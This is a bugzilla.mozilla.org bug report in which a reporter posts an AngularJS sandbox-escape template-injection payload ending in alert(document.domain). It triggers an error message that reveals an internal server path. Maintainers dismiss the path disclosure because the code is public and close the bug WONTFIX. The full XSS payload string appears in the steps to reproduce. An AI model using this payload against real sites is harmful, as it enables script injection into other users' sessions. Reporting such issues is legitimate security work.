If you think a bug might affect users in the 57 release, please set the correct tracking and status flags for Release Management.

Status

()

bugzilla.mozilla.org
General
RESOLVED WONTFIX
a month ago
a month ago

People

(Reporter: MrR3boot, Unassigned)

Tracking

Production

Details

(Reporter)

Description

a month ago
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Build ID: 20170628075643

Steps to reproduce:

1. Comment any bug with below payload.

{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}


Actual results:

Could not parse the 'params' argument as valid JSON. Error: , or } expected while parsing object/hash, at character offset 238 (before "astNode=pop();astNod...") at /data/www/bugzilla.mozilla.org/Bugzilla/WebService/Server/REST.pm line 375. Value:


Expected results:

It should n't disclose the internal path which is normally not visible for remote users.

Comment 1

a month ago
> It should n't disclose the internal path which is normally not visible for remote users.

Why not? Which problem does the disclosure create? This ticket is missing the description of an actual problem.

Also note that Bugzilla is free software. Anyone can inspect its source code as it is available to public.
Flags: needinfo?(bughunter5672)
Thanks for the bug report! I can understand how from a different context (of closed source web apps) this could be a problem,
but our source code is not a secret. 

Note that we do filter stack traces -- stack traces can show the filename and even the method names, but not the arguments to those methods (this isn't the case with this error, which has no trace).

If you think the error message should be friendlier, you could submit a pull request against the repo.
The offending code is here; https://github.com/mozilla-bteam/bmo/blob/master/Bugzilla/WebService/Server/REST.pm#L375-L378.

Otherwise I'll close this as WONTFIX as there many other things that need fixing.

In the future if you find something that might be a security bug on bugzilla.mozilla.org, please use this form:
https://bugzilla.mozilla.org/form.web.bounty as it will ensure the bug is created in a security group (to prevent it from being totally public, as this bug is) until a person has time to look at it.
Assignee: webservice → nobody
Status: UNCONFIRMED → NEW
Component: WebService → General
Ever confirmed: true
Flags: needinfo?(bughunter5672)
Product: Bugzilla → bugzilla.mozilla.org
QA Contact: default-qa
Version: unspecified → Production
Duplicate of this bug: 1389445
Status: NEW → RESOLVED
Last Resolved: a month ago
Resolution: --- → WONTFIX
Closing since no reply from original poster.
You need to log in before you can comment on or make changes to this bug.